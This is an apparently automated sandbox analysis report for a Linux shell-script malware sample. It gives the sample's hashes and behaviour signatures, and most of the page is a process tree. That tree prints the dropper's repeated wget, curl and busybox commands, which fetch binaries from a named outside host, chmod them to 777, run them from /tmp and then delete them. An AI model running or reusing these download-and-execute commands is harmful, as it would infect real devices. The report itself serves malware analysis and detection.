Analysis
-
max time kernel
139s -
max time network
137s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21/10/2024, 01:32
Static task
static1
Behavioral task
behavioral1
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh
-
Size
10KB
-
MD5
b319003c3c601274b8d3c96e303370c0
-
SHA1
9fe9064eb8767a3ea42c466bf21bce04eee50006
-
SHA256
9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d
-
SHA512
d215c64d523bfa6118135a76e27c20d1e7c53b3875d78412c3a25647e0075ee43bce16c44821f92b0acf65cd485b6f3067fc9beadb5daa282a1ba39768c33394
-
SSDEEP
192:voNYIHKWYUzPf7v6qfo0M+//YJSw1zPL36qfo0G//YJXIYIHKWe:voOq76qfo0M+//YJSwh6qfo0G//YJX9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh/tmp/9d27b63454942e4511d5493ac4b691680f8d0247b461d5e25f62491eeab8329d.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:705
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:731
-
-
/bin/chmodchmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:736
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- System Network Configuration Discovery
PID:737
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- System Network Configuration Discovery
PID:740
-
-
/bin/chmodchmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:743
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:744
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:792
-
-
/bin/chmodchmod 777 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6./7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:794
-
-
/bin/rmrm 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵PID:795
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:796
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:832
-
-
/bin/chmodchmod 777 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK./oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:835
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- System Network Configuration Discovery
PID:836
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- System Network Configuration Discovery
PID:839
-
-
/bin/chmodchmod 777 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha./3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:842
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- System Network Configuration Discovery
PID:843
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- System Network Configuration Discovery
PID:846
-
-
/bin/chmodchmod 777 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP./wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- System Network Configuration Discovery
PID:850
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:853
-
-
/bin/chmodchmod 777 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23./mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:856
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- System Network Configuration Discovery
PID:857
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- System Network Configuration Discovery
PID:860
-
-
/bin/chmodchmod 777 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR./xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:863
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- System Network Configuration Discovery
PID:864
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- System Network Configuration Discovery
PID:867
-
-
/bin/chmodchmod 777 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is./Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:874
-
-
/bin/chmodchmod 777 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C./R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- System Network Configuration Discovery
PID:881
-
-
/bin/chmodchmod 777 RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai./RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN./v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF./mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk./R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:909
-
-
/bin/chmodchmod 777 mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV23./mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm mlVsRfiQX7rESrWQ13qgTPgMvaPQ2prV232⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- System Network Configuration Discovery
PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR./xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm xq8aFDJgDJkwbAhAyStEswTR42A2FQCCtR2⤵PID:919
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- System Network Configuration Discovery
PID:923
-
-
/bin/chmodchmod 777 Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is./Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm Ji3DTo5mTNUErszSArM1M0npAfRlmGM1is2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C./R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm R5SBHGhZ2d85MmRLaaxc9Qiv9EjeNatL6C2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP./wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:940
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- System Network Configuration Discovery
PID:944
-
-
/bin/chmodchmod 777 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN./v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF./mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- System Network Configuration Discovery
PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- System Network Configuration Discovery
PID:958
-
-
/bin/chmodchmod 777 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk./R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:965
-
-
/bin/chmodchmod 777 RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai./RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- System Network Configuration Discovery
PID:972
-
-
/bin/chmodchmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6./7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:981
-
-
/bin/rmrm 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK./oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- System Network Configuration Discovery
PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha./3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:996
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:1000
-
-
/bin/chmodchmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- File and Directory Permissions Modification
PID:1001
-
-
/tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Executes dropped EXE
PID:1002
-
-
